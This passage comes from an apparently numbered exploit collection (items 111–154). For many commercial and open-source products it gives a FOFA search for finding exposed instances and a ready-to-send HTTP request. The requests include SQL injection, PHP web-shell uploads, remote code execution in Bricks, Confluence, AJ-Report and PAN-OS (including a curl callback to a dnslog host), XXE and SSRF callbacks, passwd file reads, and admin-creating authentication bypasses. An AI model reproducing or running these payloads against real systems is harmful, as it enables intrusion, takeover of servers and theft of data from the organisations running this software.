Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

111. WordPress Plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress Plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip


Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "<value obtained in step 1>",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--

117. WordPress LayerSlider plugin SQL injection
version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--


Then access /home/src.php

119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default credentials are admin/admin
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

120. 北京百绰智能 S40 management platform web.php import arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328--


File path: /upload/2.php

121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328


Uploaded file path: boot/web/upload/weblogo/1.php

122. 北京百绰智能 S200 management platform /importexport.php SQL injection
CVE-2024-2771
FOFA:title="Smart管理平台"
The sql parameter value c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the base64 encoding of the SQL statement; decoded: sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. 湖南建研 engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

Uploaded file path: http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

After the user has been created, log in to the admin backend directly; system commands can then be executed.

126. Aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. 广联达 Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin backend: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 cloud mall file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. 网康 NS-ASG application security gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. 网康 NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. 福建科立迅 communications command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. 福建科立讯 communications command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. 福建科立讯 communications command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. 福建科立讯 communications command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. 建科立讯 communications command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin
143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to be executed
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v.4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component ids
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd into a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: visit
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. 天维尔 fire and rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
